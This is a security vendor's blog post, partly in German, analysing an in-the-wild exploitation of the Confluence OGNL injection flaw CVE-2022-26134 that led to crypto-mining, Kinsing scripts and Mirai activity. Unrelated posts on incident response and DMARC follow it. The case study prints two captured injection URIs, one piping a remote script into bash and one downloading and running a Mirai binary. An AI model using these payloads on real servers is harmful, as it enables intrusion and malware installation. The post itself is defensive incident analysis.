Blog

Einblicke in das SOC-Team

Detection and guidance for the Confluence CVE-2022-26134 zero-Day

Standard-BlogbildStandard-BlogbildStandard-BlogbildStandard-BlogbildStandard-BlogbildStandard-Blogbild
12
Juni 2022
12
Juni 2022
Dieser Blog befasst sich mit der neuesten Sicherheitslücke, die die Atlassian Confluence Suite im Juni 2022 betrifft. Er enthält allgemeine Hinweise und einen Fall, in dem Darktrace während des ersten Wochenendes mit Angriffen in freier Wildbahn eine kundenseitige Ausnutzung dieser Sicherheitslücke entdeckt und darauf reagiert hat. Dieser Angriff war Teil einer größeren Krypto-Mining-Aktivität.

Zusammenfassung

  • CVE-2022-26134 is an unauthenticated OGNL injection vulnerability which allows threat actors to execute arbitrary code on Atlassian Confluence Server or Data Centre products (not Cloud).
  • Atlassian hat in seinem Sicherheitshinweis mehrere Patches und eine vorübergehende Entschärfung veröffentlicht . Dieses wurde seit dem Auftreten der Sicherheitslücke ständig aktualisiert.
  • Darktrace entdeckte und reagierte auf einen Fall am ersten Wochenende der weit verbreiteten Ausnutzung dieses CVEs.

Einführung

Mit Blick auf das Jahr 2022 äußerte die Sicherheitsbranche weitreichende Bedenken hinsichtlich der Gefährdung durch Drittanbieter und Integrationsschwachstellen. [1] Nachdem es bereits eine Handvoll "in-the-wild"-Exploits gegen Okta (CVE-2022-22965) und Microsoft (CVE-2022-30190) gab, wurde Anfang Juni eine weitere kritische Schwachstelle für Remotecodeausführung (RCE) bekannt, die die Confluence-Reihe von Atlassian betrifft. Confluence ist eine beliebte Plattform für die Verwaltung von Wikis und den Austausch von Wissen, die von Unternehmen weltweit genutzt wird. Diese neueste Sicherheitslücke (CVE-2022-26134) betrifft alle Versionen von Confluence Server und Data Centre. [2] Dieser Blog befasst sich mit der Schwachstelle selbst, einem Fall, der von Darktrace entdeckt wurde und auf den reagiert wurde, sowie mit zusätzlichen Hinweisen für die breite Öffentlichkeit und bestehende Kunden von Darktrace .

Die Ausnutzung dieses CVE erfolgt durch eine Injektionsschwachstelle, die es Bedrohungsakteuren ermöglicht, beliebigen Code ohne Authentifizierung auszuführen. Angriffe vom Typ Injektion funktionieren durch das Senden von Daten an Webanwendungen, um unbeabsichtigte Ergebnisse zu erzielen. In diesem Fall geht es darum, OGNL-Ausdrücke (Object-Graph Navigation Language) in den Speicher des Confluence-Servers zu injizieren. Dazu wird der Ausdruck in den URI einer HTTP-Anfrage an den Server eingefügt. Bedrohungsakteure können dann eine Webshell einrichten, mit der sie interagieren und weiteren bösartigen Code einsetzen können, ohne den Server erneut nutzen zu müssen. Es ist erwähnenswert, dass mehrere Proofs-of-Concepts dieses Exploits auch online gesehen haben. [3] Da es sich um ein weithin bekannten Exploit mit kritischem Schweregrad handelt, wird er von einer Reihe von Bedrohungsakteuren wahllos genutzt.[4]

Atlassian weist darauf hin, dass Websites, die in der Confluence Cloud (über AWS) gehostet werden, für diesen Exploit nicht anfällig sind und dass er auf Unternehmen beschränkt ist, die ihre eigenen Confluence-Server betreiben.[2]

Fallstudie: Europäische Medienorganisation

Der erste entdeckte "in-the-wild"-Angriff für diesen Zero-Day wurde Atlassian als ein Angriff außerhalb der Geschäftszeiten während des Memorial-Day-Wochenendes in den USA gemeldet.[5] Die Analysten von Darktrace identifizierten einen ähnlichen Fall dieser Schwachstelle nur ein paar Tage später im Netzwerk eines europäischen Medienanbieters. Dies war Teil einer größeren Serie von Angriffen auf das Konto, an denen wahrscheinlich mehrere Bedrohungsakteure beteiligt waren. Das Timing stimmte auch mit dem Beginn weit verbreiteter öffentlicher Angriffsversuche auf andere Organisationen überein.[6]

Am Abend des 3. Juni identifizierte das Enterprise Immune System von Darktrac eeinen neuen text/x-shellscript-Download für den Benutzeragenten curl/7.61.1 auf dem Confluence-Server eines Unternehmens. Dieser stammt von einer seltenen externen IP-Adresse, 194.38.20[.]166. Es ist möglich, dass die ursprüngliche Kompromittierung kurz zuvor von 95.182.120[.]164 (einer verdächtigen russischen IP-Adresse) erfolgte, was jedoch nicht überprüft werden konnte, da die Verbindung verschlüsselt war. Auf den Download folgten kurz darauf die Ausführung einer Datei und eine ausgehende HTTP-Verbindung, an der der Agent curl beteiligt war. Es wurde ein weiterer Download einer ausführbaren Datei von 185.234.247[.]8 versucht, der jedoch von der autonomen Antwort des Antigena-Netzwerks blockiert wurde. Trotzdem begann der Confluence-Server, Sitzungen mit dem Minergate-Protokoll an einem nicht standardmäßigen Port zu bedienen. Zusätzlich zum Mining wurden auch fehlgeschlagene Beaconing-Verbindungen zu einer anderen seltenen russischen IP-Adresse, 45.156.23[.]210, hergestellt, die auf VirusTotal OSINT noch nicht als bösartig eingestuft worden war (Abbildungen 1 und 2).[7][8]

Figures 1 and 2: Unrated VirusTotal pages for Russian IPs connected to during minergate activity and failed beaconing — Darktrace identification of these IP’s involvement in the Confluence exploit occurred prior to any malicious ratings being added to the OSINT profiles

Minergate ist ein offener Krypto-Mining-Pool, der es Nutzern ermöglicht, Computer-Hashing-Leistung zu einem größeren Netzwerk von Mining-Geräten hinzuzufügen, um digitale Währungen zu gewinnen. Interessanterweise ist dies nicht das erste Mal, dass eine kritische Schwachstelle in Confluence zu finanziellen Zwecken ausgenutzt wird. Im September 2021 wurde mit CVE-2021-26084 eine weitere RCE-Schwachstelle bekannt, die ebenfalls ausgenutzt wurde, um Krypto-Miner auf nichtsahnenden Geräten zu installieren.[9]

Während der versuchten Beaconing-Aktivität wies Darktrace auch auf den Download von zwei cf.sh-Dateien mit dem ursprünglichen curl-Agenten hin. Anschließend wurden weitere bösartige Dateien von dem Gerät heruntergeladen. Die Anreicherung von VirusTotal (Abbildung 3) zusammen mit den URIs identifizierte diese als Kinsing-Shell-Skripte.[10][11] Kinsing ist ein Malware-Stamm aus dem Jahr 2020, der vor allem zur Installation eines weiteren Krypto-Miners namens "kdevtmpfsi" verwendet wurde. Antigena löste eine verdächtige Dateisperre aus, um die Verwendung dieses Miners einzudämmen. Nach diesen Downloads wurden jedoch weiterhin zusätzliche Minergate-Verbindungsversuche beobachtet. Dies könnte auf die erfolgreiche Ausführung eines oder mehrerer Skripte hindeuten.

Abbildung 3: VirusTotal bestätigt den Download der Kinsing-Shell

More concrete evidence of CVE-2022-26134 exploitation was detected in the afternoon of June 4. The Confluence Server received a HTTP GET request with the following URI and redirect location:

/${new javax.script.ScriptEngineManager().getEngineByName(“nashorn”).eval(“new java.lang.ProcessBuilder().command(‘bash’,’-c’,’(curl -s 195.2.79.26/cf.sh||wget -q -O- 195.2.79.26/cf.sh)|bash’).start()”)}/

Dies ist eine wahrscheinliche Demonstration des OGNL-Injektionsangriffs (Abbildungen 3 und 4). Die Zeichenfolge "nashorn" bezieht sich auf die Nashorn-Engine, die zur Interpretation von Javascript-Code verwendet wird und in aktiven Nutzdaten identifiziert wurde, die bei der Ausnutzung dieser CVE verwendet wurden. Im Erfolgsfall könnte einem Bedrohungsakteur eine Reverse Shell zur Verfügung gestellt werden, die (normalerweise) weitere Verbindungen mit weniger Einschränkungen bei der Portnutzung ermöglicht. [12] Nach der Injektion zeigte der Server weitere Anzeichen einer Kompromittierung, wie z. B. fortgesetzte Crypto-Mining- und SSL-Beaconing-Versuche.

Figures 4 and 5: Darktrace Advanced Search features highlighting initial OGNL injection and exploit time

Following the injection, a separate exploitation was identified. A new user agent and URI indicative of the Mirai botnet attempted to utilise the same Confluence vulnerability to establish even more crypto-mining (Figure 6). Mirai itself may have also been deployed as a backdoor and a means to attain persistency.

Figure 6: Model breach snapshot highlighting new user agent and Mirai URI

/${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(“wget 149.57.170.179/mirai.x86;chmod 777 mirai.x86;./mirai.x86 Confluence.x86”).getInputStream(),”utf-8”)).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader(“X-Cmd-Response”,#a))}/

Throughout this incident, Darktrace’s Proactive Threat Notification service alerted the customer to both the Minergate and suspicious Kinsing downloads. This ensured dedicated SOC analysts were able to triage the events in real time and provide additional enrichment for the customer’s own internal investigations and eventual remediation. With zero-days often posing as a race between threat actors and defenders, this incident makes it clear that Darktrace detection can keep up with both known and novel compromises.

A full list of model detections and indicators of compromise uncovered during this incident can be found in the appendix.

Darktrace coverage and guidance

From the Kinsing shell scripts to the Nashorn exploitation, this incident showcased a range of malicious payloads and exploit methods. Although signature solutions may have picked up the older indicators, Darktrace model detections were able to provide visibility of the new. Models breached covering kill chain stages including exploit, execution, command and control and actions-on-objectives (Figure 7). With the Enterprise Immune System providing comprehensive visibility across the incident, the threat could be clearly investigated or recorded by the customer to warn against similar incidents in the future. Several behaviors, including the mass crypto-mining, were also grouped together and presented by AI Analyst to support the investigation process.

Figure 7: Device graph showing a cluster of model breaches on the Confluence Server around the exploit event

On top of detection, the customer also had Antigena in active mode, ensuring several malicious activities were actioned in real time. Examples of Autonomous Response included:

  • Antigena / Network / External Threat / Antigena Suspicious Activity Block
  • Block connections to 176.113.81[.]186 port 80, 45.156.23[.]210 port 80 and 91.241.19[.]134 port 80 for one hour
  • Antigena / Network / External Threat / Antigena Suspicious File Block
  • Block connections to 194.38.20[.]166 port 80 for two hours
  • Antigena / Network / External Threat / Antigena Crypto Currency Mining Block
  • Block connections to 176.113.81[.]186 port 80 for 24 hours

Darktrace customers can also maximise the value of this response by taking the following steps:

  • Stellen Sie sicher, dass das Antigena-Netzwerk eingerichtet ist.
  • Regularly review Antigena breaches and set Antigena to ‘Active’ rather than ‘Human Confirmation’ mode (otherwise customers’ security teams will need to manually trigger responses).
  • Tag Confluence Servers with Antigena External Threat, Antigena Significant Anomaly or Antigena All tags.
  • Stellen Sie sicher, dass Antigena über die geeignete Firewall-Integrationen verfügt.

For each of these steps, more information can be found in the product guides on our Customer Portal

Breitere Empfehlungen für CVE-2022-26134

On top of Darktrace product guidance, there are several encouraged actions from the vendor:

  • Atlassian empfiehlt Updates auf die folgenden Versionen, in denen diese Sicherheitslücke behoben wurde: 7.4.17, 7.13.7, 7.14.3, 7.15.2, 7.16.4, 7.17.4 und 7.18.1.
  • For those unable to update, temporary mitigations can be found in the formal security advisory.
  • Ensure Internet-facing servers are up-to-date and have secure compliance practices.

Anhang

Darktrace Modelldetektionen (für den entsprechenden Vorfall)

  • Anomalous Connection / New User Agent to IP Without Hostname
  • Anomalous File / EXE from Rare External Location
  • Anomalous File / Script from Rare External
  • Anomalous Server Activity / Possible Denial of Service Activity
  • Anomalous Server Activity / Rare External from Server
  • Compromise / Crypto Currency Mining Activity
  • Compromise / High Volume of Connections with Beacon Score
  • Compromise / Large Number of Suspicious Failed Connections
  • Compromise / SSL Beaconing to Rare Destination
  • Device / New User Agent

IoCs

Dank an Hyeongyung Yeom und das Threat Research Team für ihre Beiträge.

Fußnoten

1. https://www.gartner.com/en/articles/7-top-trends-in-cybersecurity-for-2022

2. https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html

3. https://twitter.com/phithon_xg/status/1532887542722269184?cxt=HHwWgMCoiafG9MUqAAAA

4. https://twitter.com/stevenadair/status/1532768372911398916

5. https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence

6. https://www.cybersecuritydive.com/news/attackers-atlassian-confluence-zero-day-exploit/625032

7. https://www.virustotal.com/gui/ip-address/45.156.23.210

8. https://www.virustotal.com/gui/ip-address/176.113.81.186

9. https://securityboulevard.com/2021/09/attackers-exploit-cve-2021-26084-for-xmrig-crypto-mining-on-affected-confluence-servers

10. https://www.virustotal.com/gui/file/c38c21120d8c17688f9aeb2af5bdafb6b75e1d2673b025b720e50232f888808a

11. https://www.virustotal.com/gui/file/5d2530b809fd069f97b30a5938d471dd2145341b5793a70656aad6045445cf6d

12. https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134

EINBLICKE IN DAS SOC-Team
Darktrace Cyber-Analysten sind erstklassige Experten für Threat Intelligence, Threat Hunting und Incident Response. Sie bieten Tausenden von Darktrace Kunden auf der ganzen Welt rund um die Uhr SOC-Support. Einblicke in das SOC-Team wird ausschließlich von diesen Experten verfasst und bietet Analysen von Cyber-Vorfällen und Bedrohungstrends, die auf praktischen Erfahrungen in diesem Bereich basieren.
AUTOR
ÜBER DEN AUTOR
Gabriel Few-Wiegratz
Head of Threat Intelligence Hub
Book a 1-1 meeting with one of our experts
share this article
ANWENDUNGSFÄLLE
Keine Artikel gefunden.
PRODUKT-SPOTLIGHT
Keine Artikel gefunden.
COre-Abdeckung
Keine Artikel gefunden.

More in this series

Keine Artikel gefunden.

Blog

Keine Artikel gefunden.

Customer Blog: Community Housing Limited Enhancing Incident Response

Standard-BlogbildStandard-Blogbild
04
Mar 2024

About Community Housing Limited

Community Housing Limited is a non-profit organization based in Australia that focuses on providing affordable, long-term housing and creating employment opportunities where possible. We give people the security of having a home so that they can focus on other essential pathways. As such, we are responsible for sensitive information on our clients.

As part of our commitment to strengthening our cyber security, we sought to simplify and unify our incident response plans and equip our engineers and desktop support teams with all the information we need at our fingertips.

Why Community Housing Limited chose Darktrace

Our team hoped to achieve a response procedure that allowed us to have oversight over any potential security risks, even cases that don’t overtly seem like a security risk. For example, an incident could start as a payroll issue and end up in the hands of HR, instead of surfacing as a security problem. In this case, our security team has no way of knowing the real number of events or how the threat had actually started and played out, making incident response and mitigation even more challenging.

We were already a customer of Darktrace’s autonomous threat detection, attack intervention, and attack surface management capabilities, and decided to add Darktrace for AI-assisted incident response and AI cyber-attack simulation.

AI-generated playbooks save time during incident response

I wanted to reduce the time and resources it took our security team to appropriately respond to a threat. Darktrace automates several steps of the recovery process to accelerate the rate of incident response by using AI that learns the granular details of the specific organization, building a dynamic understanding of the devices, connections, and user behaviors that make up the normal “pattern of life.”  

The AI then uses this understanding to create bespoke, AI-generated incident response playbooks that leverage an evolving understanding of our organization to determine recovery steps that are tailored not only to the specific incident but also to our unique environment.

For my security team, this means having access to all the information we need to respond to a threat. When running through an incident, rather than going to different places to synthesize relevant information, which takes up valuable resources and time, we can speed up its remediation with Darktrace.  

The playbooks created by Darktrace help lower the technical skills required to respond to incidents by elevating the workload of the staff, tripling our capacity for incident response.

Realistic attack simulations upskill teams while saving resources

We have differing levels of experience on the team which means some members know exactly what to do during incident response while others are slower and need more guidance. Thus, we have to either outsource skilled security professionals or add a security solution that could lower the technical skills bar.

You don’t want to be second guessing and searching for the right move – it’s urgent – there should be certainty. Our goal with running attack simulations is to test and train our team's response capabilities in a “realistic” scenario. But this takes considerable time to plan and execute or can be expensive if outsourced, which can be a challenge for organizations short on resources. 

Darktrace provides AI-assisted incident response and cyber-attack simulation using AI that understands the organization to run simulations that effectively map onto the real digital environment and the assets within it, providing training for actual incidents.

It is one thing to sit together in a meeting and discuss various outcomes of a cyber-attack, talking through the best response strategies. It is a huge benefit being able to run attack simulations that emulate real-world scenarios.

Our team can now see how an incident would play out over several days to resemble a real-world scenario or it can play through the simulation quickly to ascertain outcomes immediately. It then uses these insights to strengthen its technology, processes, and training.

AI-Powered Incident Response

Darktrace helps my security team save resources and upskill staff using AI to generate bespoke playbooks and run realistic simulations. Its real-time understanding of our business ensures incident preparedness and incident response are tailored to not only the specific threat in question, but also to the contextual infrastructure of the organization.  

Continue reading
About the author
Jamie Woodland
Head of Technology at Community Housing Limited

Blog

E-Mail

Beyond DMARC: Navigating the Gaps in Email Security

Standard-BlogbildStandard-Blogbild
29
Feb 2024

Email threat landscape  

Email has consistently ranked among the most targeted attack vectors, given its ubiquity and criticality to business operations. From September to December 2023, 10.4 million phishing emails were detected across Darktrace’s customer fleet demonstrating the frequency of attempted email-based attacks.

Businesses are searching for ways to harden their email security posture alongside email providers who are aiming to reduce malicious emails traversing their infrastructure, affecting their clients. Domain-based Message Authentication (DMARC) is a useful industry-wide protocol organizations can leverage to move towards these goals.  

What is DMARC?

DMARC is an email authentication protocol designed to enhance the security of email communication.

Major email service providers Google and Yahoo recently made the protocol mandatory for bulk senders in an effort to make inboxes safer worldwide. The new requirements demonstrate an increasing need for a standardized solution as misconfigured or nonexistent authentication systems continue to allow threat actors to evade detection and leverage the legitimate reputation of third parties.  

DMARC is a powerful tool that allows email administrators to confidently identify and stop certain spoofed emails; however, more organizations must implement the standard for it to reach its full potential. The success and effectiveness of DMARC is dependent on broad adoption of the standard – by organizations of all sizes.  

How does DMARC work?

DMARC builds on two key authentication technologies, Sender Policy Framework (SPF) and DomainKeys Identified Mail (DKIM) and helps to significantly improve their ability to prevent domain spoofing. SPF verifies that a sender’s IP address is authorized to send emails on behalf of a particular domain and DKIM ensures integrity of email content by providing a verifiable digital signature.  

DMARC adds to this by allowing domain owners to publish policies that set expectations for how SPF and DKIM verification checks relate to email addresses presented to users and whose authenticity the receiving mail server is looking to establish.  

These policies work in tandem to help authenticate email senders by verifying the emails are from the domain they say they are, working to prevent domain spoofing attacks. Key benefits of DMARC include:

  1. Phishing protection DMARC protects against direct domain spoofing in which a threat actor impersonates a legitimate domain, a common phishing technique threat actors use to trick employees to obtain sensitive information such as privileged credentials, bank information, etc.  
  2. Improving brand reputation: As DMARC helps to prevent impersonation of domains, it stands to maintain and increase an organization’s brand reputation. Additionally, as organizational reputation improves, so will the deliverability of emails.
  3. Increased visibility: DMARC provides enhanced visibility into email communication channels, including reports of all emails sent on behalf of your domain. This allows security teams to identify shadow-IT and any unauthorized parties using their domain.

Understanding DMARC’s Limitations

DMARC is often positioned as a way for organizations to ‘solve’ their email security problems, however, 65% of the phishing emails observed by Darktrace successfully passed DMARC verification, indicating that a significant number of threat actors are capable of manipulating email security and authentication systems in their exploits. While DMARC is a valuable tool in the fight against email-based attacks, the evolving threat landscape demands a closer look at its limitations.  

As threat actors continue to innovate, improving their stealth and evasion tactics, the number of attacks with valid DMARC authentication will only continue to increase in volume and sophistication. These can include:

  1. Phishing attacks that leverage non-spoofed domains: DMARC allows an organization to protect the domains that they own, preventing threat actors from being able to send phishing emails from their domains. However, threat actors will often create and use ‘look-a-like’ domains that closely resemble an organization’s domain to dupe users. 3% of the phishing emails identified by Darktrace utilized newly created domains, demonstrating shifting tactics.  
  2. Email Account Takeovers: If a threat actor gains access to a user’s email account through other social engineering means such as credential stuffing, they can then send phishing emails from the legitimate domain to pursue further attacks. Even though these emails are malicious, DMARC would not identify them as such because they are coming from an authorized domain or sender.  

Organizations must also ensure their inbound analysis of emails is not skewed by successful DMARC authentication. Security teams cannot inherently trust emails that pass DMARC, because the source cannot always be legitimized, like in the event of an account takeover. If a threat actor gains access to an authenticated email account, emails sent by the threat actor from that account will pass DMARC – however the contents of that email may be malicious. Sender behavior must be continuously evaluated and vetted in real time as past communication history and validated DMARC cannot be solely relied upon amid an ever-changing threat landscape.  

Security teams should lean on other security measures, such as anomaly detection tools that can identify suspicious emails without relying on historical attack rules and static data. While DMARC is not a silver bullet for email security, it is nevertheless foundational in helping organizations protect their brand identity and must be viewed as an essential layer in an organization's overall cyber security strategy.  

Implementing DMARC

Despite the criticality of DMARC for preserving brand reputation and trust, adoption of the standard has been inconsistent. DMARC can be complex to implement with many organizations lacking the time required to understand and successfully implement the standard. Because of this, DMARC set-up is often outsourced, giving security and infrastructure teams little to no visibility into or control of the process.  

Implementation of DMARC is only the start of this process, as DMARC reports must be consistently monitored to ensure organizations have visibility into who is sending mail from their domain, the volume of mail being sent and whether the mail is passing authentication protocols. This process can be time consuming for security teams who are already faced with mounting responsibilities, tight budgets, and personnel shortages. These complexities unfortunately delay organizations from using DMARC – especially as many today still view it as a ‘nice to have’ rather than an essential.  

With the potential complexities of the DMARC implementation process, there are many ways security and infrastructure teams can still successfully roll out the standard. Initial implementation should start with monitoring, policy adjustment and then enforcement. As business changes over time, DMARC should be reviewed regularly to ensure ongoing protection and maintain domain reputation.

The Future of Email Security

As email-based attacks continue to rise, the industry must recognize the importance of driving adoption of foundational email authentication protocols. To do this, a new and innovative approach to DMARC is needed. DMARC products must evolve to better support organizations throughout the ongoing DMARC monitoring process, rather than just initial implementation. These products must also be able to share intelligence across an organization’s security stack, extending beyond email security tools. Integration across these products and tools will help organizations optimize their posture, ensuring deep understanding of their domain and increased visibility across the entire enterprise.

DMARC is critical in protecting brand identity and mitigating exact-domain based attacks. However, organizations must understand DMARC’s unique benefits and limitations to ensure their inboxes are fully protected. In today’s evolving threat landscape, organizations require a robust, multi-layered approach to stop email threats – in inbound mail and beyond. Email threats have evolved – its time security does too.

Join Darktrace on 9 April for a virtual event to explore the latest innovations needed to get ahead of the rapidly evolving threat landscape. Register today to hear more about our latest innovations coming to Darktrace’s offerings. For additional insights check out Darktrace’s 2023 End of Year Threat Report.

Credit to Carlos Gray and Stephen Pickman for their contribution to this blog

Continue reading
About the author
Carlos Gray
Product Manager

Gute Nachrichten für Ihr Unternehmen.
Schlechte Nachrichten für die Bösewichte.

Starten Sie Ihren kostenlosen Test

Starten Sie Ihren kostenlosen Test

Flexible Lieferung
Cloud-based deployment.
Schnelle Installation
Nur 1 Stunde für die Einrichtung - und noch weniger für eine Testversion der E-Mail-Sicherheit.
Wählen Sie Ihre Reise
Testen Sie selbstlernende KI dort, wo Sie sie am meisten brauchen - in der Cloud, im Netzwerk oder für E-Mail.
Keine Verpflichtung
Voller Zugriff auf den Darktrace Threat Visualizer und drei maßgeschneiderte Bedrohungsberichte, ohne Kaufverpflichtung.
For more information, please see our Privacy Notice.
Thanks, your request has been received
A member of our team will be in touch with you shortly.
YOU MAY FIND INTERESTING
Huch! Beim Absenden des Formulars ist etwas schief gelaufen.

Demo anfordern

Flexible Lieferung
Sie können es entweder virtuell oder mit Hardware installieren.
Schnelle Installation
Nur 1 Stunde für die Einrichtung - und noch weniger für eine Testversion der E-Mail-Sicherheit.
Wählen Sie Ihre Reise
Testen Sie selbstlernende KI dort, wo Sie sie am meisten brauchen - in der Cloud, im Netzwerk oder für E-Mail.
Keine Verpflichtung
Voller Zugriff auf den Darktrace Threat Visualizer und drei maßgeschneiderte Bedrohungsberichte, ohne Kaufverpflichtung.
Vielen Dank! Ihre Anfrage ist eingegangen!
Huch! Beim Absenden des Formulars ist etwas schief gelaufen.